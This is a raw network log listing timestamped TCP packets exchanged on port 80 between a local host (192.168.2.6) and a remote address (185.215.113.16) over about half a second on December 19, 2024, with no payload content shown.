Dec 19, 2024 10:10:38.832848072 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.833761930 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.833839893 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.833880901 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.833934069 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.834860086 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.834999084 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.835051060 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.835975885 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.836025000 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.836122036 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.836159945 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.837228060 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.837282896 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.837316990 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.837374926 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.838186979 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.838244915 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.838325024 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.838366032 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.839587927 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.839643002 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.839643955 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.839696884 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.840476990 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.840536118 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.840576887 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.840681076 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.841466904 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.841540098 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.841557980 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.841588020 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.842550993 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.842637062 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.842694998 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.843605995 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.843652010 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.843683958 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.843761921 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.844893932 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.844964981 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.845103979 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.845160007 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.846226931 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.846282005 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.846304893 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.846354961 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.847208023 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.847290039 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.847304106 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.847839117 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.848251104 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.848350048 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.848409891 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.849112034 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.849169970 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.849189997 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.850708961 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.850791931 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.850841999 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.850879908 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.850934982 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.851840973 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.851886988 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.851906061 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.851946115 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.852782965 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.852833033 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.852839947 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.852894068 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.853780031 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.853806973 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.853854895 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.853854895 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.854859114 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.854924917 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.854964972 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.855015039 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.855618000 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.855705023 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.855786085 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.855833054 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.856877089 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.856930017 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.856967926 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.857021093 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.858072996 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.858134031 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.858184099 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.858288050 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.859162092 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.859267950 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.859311104 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.859373093 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.860111952 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.860177994 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.860204935 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.860235929 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.861148119 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.861411095 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.861466885 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.862215042 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.862262011 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.862310886 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.862359047 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.863352060 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.863419056 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.863569021 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.863672972 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.864439011 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.864509106 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.864526033 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.864931107 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.865494967 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.865608931 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.865674973 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.866579056 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.866717100 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.866779089 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.867744923 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.867811918 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.867850065 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.868045092 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.868798018 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.868916035 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.993130922 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.993201017 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.993223906 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.993271112 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.993576050 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.993647099 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.993791103 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.993849993 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.993897915 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.994033098 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.994910955 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.994967937 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.994983912 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.995014906 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.996062994 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.996156931 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.996165991 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.996222019 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.997302055 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.997365952 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.997529030 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.997623920 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.998452902 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.998522997 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.998572111 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.998631001 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.999607086 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.999680042 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.011066914 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.011110067 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.011142969 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.011172056 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.011450052 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.011522055 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.011523962 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.011754990 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.012432098 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.012540102 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.012551069 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.012603045 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.013571978 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.013642073 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.013672113 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.013726950 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.014780045 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.014868021 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.014911890 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.014955044 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.015726089 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.015784025 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.015784979 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.015835047 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.016830921 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.016907930 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.016962051 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.017016888 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.017961025 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.018016100 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.018054962 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.018100977 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.019088030 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.019167900 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.019228935 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.020102024 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.020230055 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.020296097 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.021245956 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.021313906 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.021334887 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.021389961 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.022473097 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.022537947 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.022557974 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.022769928 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.023423910 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.023485899 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.023571968 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.023657084 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.024794102 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.024929047 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.024945974 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.024992943 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.026185036 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.026269913 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.026276112 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.026407003 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.027090073 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.027188063 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.027189970 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.027236938 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.028002977 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.028070927 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.028131962 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.028177977 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.029138088 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.029196978 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.029206038 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.029237032 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.030065060 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.030122042 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.030153990 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.030203104 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.031187057 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.031232119 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.031327009 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.031373978 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.032540083 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.032589912 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.032623053 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.032669067 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.033627987 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.033735991 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.033782959 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.034683943 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.034737110 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.034778118 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.034832001 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.035944939 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.035995960 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.036031008 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.036076069 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.037061930 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.037131071 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.037230015 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.037288904 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.038187981 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.038249016 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.038541079 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.038594007 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.039402008 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.039455891 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.039493084 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.039544106 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.040312052 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.040366888 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.040368080 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.040414095 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.041421890 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.041481972 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.041630983 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.041716099 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.042587996 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.042635918 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.042678118 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.042757988 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.043711901 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.043801069 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.043819904 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.043920040 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.044970036 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.045032024 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.045046091 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.045326948 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.045984030 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.046041965 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.046055079 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.046102047 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.047390938 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.047477961 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.047527075 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.047702074 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.048635006 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.048690081 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.048902988 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.049062014 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.049871922 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.049926043 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.050113916 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.050334930 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.051331043 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.051417112 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.051434040 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.051462889 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.052604914 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.052654028 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.052932024 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.052988052 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.053832054 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.053884029 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.053931952 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.054027081 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.054936886 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.054994106 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.055037022 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.055182934 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.056031942 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.056126118 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.056312084 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.057462931 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.057538986 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.057585001 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.057657957 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.058509111 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.058568954 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.058619022 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.059559107 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.059617996 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.059721947 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.059770107 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.060561895 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.060611963 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.060628891 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.060672998 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.061505079 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.061556101 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.061619997 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.061680079 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.062612057 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.062661886 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.062683105 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.062712908 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.185563087 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.185584068 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.185647964 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.185699940 CET	49928	80	192.168.2.6	185.215.113.16
